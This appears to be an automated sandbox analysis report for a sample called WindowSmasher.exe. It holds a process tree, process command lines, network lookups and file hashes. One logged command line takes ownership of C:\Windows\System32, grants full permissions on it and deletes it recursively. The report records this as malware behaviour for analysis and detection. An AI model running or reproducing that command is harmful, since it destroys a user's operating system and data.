PID 4192 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe C:\Windows\SysWOW64\cmd.exe
PID 4192 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe C:\Windows\SysWOW64\cmd.exe
PID 4192 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe C:\Windows\SysWOW64\cmd.exe
PID 224 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 224 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 224 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 224 wrote to memory of 2352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 224 wrote to memory of 2352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 224 wrote to memory of 2352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 1712 wrote to memory of 3540 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3540 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3748 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3276 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 3276 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1712 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe

"C:\Users\Admin\AppData\Local\Temp\WindowSmasher.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /F C:\Windows\System32\* /A & icacls C:\Windows\System32 /grant administrators:F /T & RD /S /Q C:\Windows\System32

C:\Windows\SysWOW64\takeown.exe

takeown /F C:\Windows\System32\* /A

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32 /grant administrators:F /T

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x78,0x128,0x7ff85a8d46f8,0x7ff85a8d4708,0x7ff85a8d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,17375494314450387044,7750196343702856239,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,17375494314450387044,7750196343702856239,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,17375494314450387044,7750196343702856239,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,17375494314450387044,7750196343702856239,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,17375494314450387044,7750196343702856239,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,17375494314450387044,7750196343702856239,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,17375494314450387044,7750196343702856239,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4158365912175436289496136e7912c2
SHA1 813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59
SHA256 354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1
SHA512 74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b

\??\pipe\LOCAL\crashpad_1712_WRJZWNRIZYFZRHWM

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ce4c898f8fc7601e2fbc252fdadb5115
SHA1 01bf06badc5da353e539c7c07527d30dccc55a91
SHA256 bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa
SHA512 80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6ff7a71a9cf3348caf83ba69ae05f6f7
SHA1 4d99034e30d1d636b4db13d4dac8ba13b1f5a8b1
SHA256 fdcd2d6855f8bb7b439549e6db812015874c918c60910ad09c71f8c2a8f08ad8
SHA512 19ff1e8ac496dba3939f6abc93dca55edb97c7481c802113689ded821bf5d7b09836f2df7f0a5d4810603ad0d16e31d10a7951e2e23b618fb5c1a1060684e508

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 007f08cf181866c68c2f48541c77fe2f
SHA1 5238878aff3a1ff40c08df67ed7b0ee6fc0477ec
SHA256 ad6d83457f925debe8207b15dfbfb5ec198ac5c931ba704b84c832bdd117b42a
SHA512 03f4ef14e1da25ec11d7f1a9a13300e2fad48cd1f4ba30400e2ea54602bb6cc8e53e98a639bc14a808466d60ae15e81ba2e2da72c1bc9183c202dc76e186a170

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fa9e6718150ecc0be5ca3e71fd8e2977
SHA1 8ec6f4daa7d17ba677e2ce4e297a01832ece0960
SHA256 22dc7db8beecad1006c41b6ea3b868be7e5c11baf0b6a25b361990bc3d1c27f1
SHA512 b7fef0aa37e3228c1c94c3b7d70c53843ed3d0ebe28a69d56f3f41edde1e97bbd4184f9e452631aac6d17ddbabffdc73a27eb2c800f94d5f029f61cf171873d5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58